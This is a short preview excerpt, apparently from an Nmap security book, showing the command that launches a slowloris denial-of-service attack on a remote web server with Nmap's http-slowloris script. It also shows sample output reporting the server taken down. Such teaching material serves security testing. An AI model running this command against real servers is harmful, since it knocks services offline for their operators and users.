May 2017
Intermediate to advanced
416 pages
21h 33m
English
To launch a slowloris attack against a remote web server with Nmap, use the following command:
$nmap -p80 --script http-slowloris --max-parallelism 400 <target>
By default, the script will run for 30 minutes if the server keeps responding. If the server goes down, some statistics are returned:
PORT STATE SERVICE REASON 80/tcp open http syn-ack | http-slowloris: | Vulnerable: | theDoS attack took +5m35s | with 300 concurrent connections |_ and 900 sent queries
Read now
Unlock full access